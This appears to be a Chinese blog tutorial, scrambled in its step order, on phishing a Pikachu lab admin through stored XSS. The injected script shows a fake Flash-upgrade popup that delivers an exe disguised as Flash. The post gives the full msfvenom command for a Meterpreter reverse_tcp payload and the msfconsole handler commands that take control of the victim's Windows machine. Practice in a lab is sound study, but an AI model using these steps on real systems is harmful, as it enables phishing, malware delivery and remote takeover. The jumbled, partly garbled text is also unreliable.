flash攻击钓到 wins电脑权限
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.182.145 LPORT3366 -f exe shell.exe 5.6 病毒修改为 真正的exe的文件名称, 2. 复制js代码 并保存在apache的网站根目录下保存为js文件, 输入shell命令即可执行命令, 5.8 可以看到下载下来的是我们伪装成执行程序的病毒,。
如果通过ip访问可跳转到假网站点击下载效果相同, 5.5 打开kali制作病毒, 6. 在kali先进行监听操作 msfconsole //依次执行代码 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.182.145 //注意和生成病毒时一致 set lport 3366 run 7. 当受害者双击运行可执行程序时kali攻击者可监测到, , 5.4 在1.js文件中 将受害者点击下载的文件名改为真的flash执行文件的名称, 1. 打开XSS网站https://xssaq.com 注册登录,当管理员认为需要升级时点击“立即升级”, 5. 当管理员点击“立即升级”下载“病毒”flash可执行文件,点击“保存”,点击公共模块选择FLASH弹窗钓鱼。
8.输入命令mstsc 被控制目标执行相同命令 通关xss-flash钓鱼获取目标的操作权限基本演示结束。
因为该网站页面与病毒执行文件在网站根目录的同一级内, 5.2 修改文件后 在数据库的xssblind表中删除所有记录并将js文件再次通过xss漏洞发送给后台, script src/script 5.3 搭建一个假的flash网页 将下载的包解压放在网站根目录下,5.1 为了更加真实 将1.js文件内容可执行exe文件地址和名称改为ip/flash.exe, 5.7 刷新admin页面 弹出钓鱼弹窗, 3. 以pikachu后台管理员作为攻击对象 从xss漏洞关卡输入代码引用外部的js文件 攻击者输入代码script src/script 4. 刷新后台管理界面显示钓鱼信息。
- 上一篇:磁力熊猫
- 下一篇:羊大师科普:长期吃泡面伤哪里?不是防腐剂惹
评论列表